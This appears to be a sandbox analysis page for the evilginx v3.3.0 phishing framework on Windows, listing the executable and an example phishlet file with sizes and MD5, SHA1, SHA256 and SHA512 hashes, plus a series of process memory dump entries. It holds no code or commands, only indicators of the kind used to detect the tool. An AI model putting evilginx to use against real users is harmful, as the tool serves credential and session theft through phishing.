d65b8ae83752865542b7d4dd2244dd3394182b07e2bd76aac180f828b3b73f9552d79fbfc3bcdf72e376f105ab57a1e31c94f84a75dcc2e4fac7f713213f0e5c

Download Submit
C:\Users\Admin\Downloads\evilginx-v3.3.0-windows-64bit\evilginx.exe

Filesize
14.7MB

MD5
3623a872e8922c6b9e5959400727986c

SHA1
a9a4754bad80e30079858509ab7fc399bd53db48

SHA256
90468b77362dc9bea21efe8d32c03b7fed9c6adedd2792078a77a17cb4fca5f4

SHA512
156c34e1fe704b2e8a4312df18cf56950cfc27a37136b5addebcfee7b1f81939db1a262f5d19784c179ca962a657023832050460f078932cd105c31f7f85061b

Download Submit
C:\Users\Admin\Downloads\evilginx-v3.3.0-windows-64bit\phishlets\example.yaml

Filesize
623B

MD5
637eee759619bf8d84e8f943c6b255f3

SHA1
b6f00bf77746ff0fe30a87f8d10433aa1381dae6

SHA256
1a8aadbef804d1ff71b736dabe791f6275d9d6a354b59e439f8fce55fec92f9e

SHA512
b61d6e3e77ef1f706839553fcfb8d434e31e68fd05d0421a6b3aff27d615a14b518a7cf72ffa6bcdc52fd99a40d7ae4b0f05594ef224efff2d317b9a29338abc

Download Submit
memory/1600-42-0x00007FFE25060000-0x00007FFE25A4C000-memory.dmp

Filesize
9.9MB

Download
memory/1600-39-0x00007FFE25060000-0x00007FFE25A4C000-memory.dmp

Filesize
9.9MB

Download
memory/1600-38-0x00000201CEA90000-0x00000201CEC52000-memory.dmp

Filesize
1.8MB

Download
memory/1600-37-0x00000201B43D0000-0x00000201B43E8000-memory.dmp

Filesize
96KB

Download
memory/1600-40-0x00007FFE25060000-0x00007FFE25A4C000-memory.dmp

Filesize
9.9MB

Download
memory/1600-43-0x00007FFE25060000-0x00007FFE25A4C000-memory.dmp

Filesize
9.9MB

Download
memory/1600-41-0x00000201CF290000-0x00000201CF7B6000-memory.dmp

Filesize
5.1MB

Download
memory/1600-44-0x00000201B4830000-0x00000201B483E000-memory.dmp

Filesize
56KB

Download
memory/3128-33-0x00007FFE25060000-0x00007FFE25A4C000-memory.dmp

Filesize
9.9MB

Download
memory/3128-10-0x00007FFE25060000-0x00007FFE25A4C000-memory.dmp

Filesize
9.9MB

Download
memory/3128-9-0x000001D5F2320000-0x000001D5F2396000-memory.dmp

Filesize
472KB

Download
memory/3128-6-0x00007FFE25060000-0x00007FFE25A4C000-memory.dmp

Filesize
9.9MB

Download
memory/3128-5-0x000001D5F2160000-0x000001D5F2182000-memory.dmp

Filesize
136KB

Download
memory/3128-25-0x00007FFE25060000-0x00007FFE25A4C000-memory.dmp

Filesize
9.9MB

Download
memory/3128-4-0x00007FFE25063000-0x00007FFE25064000-memory.dmp

Filesize
4KB

Download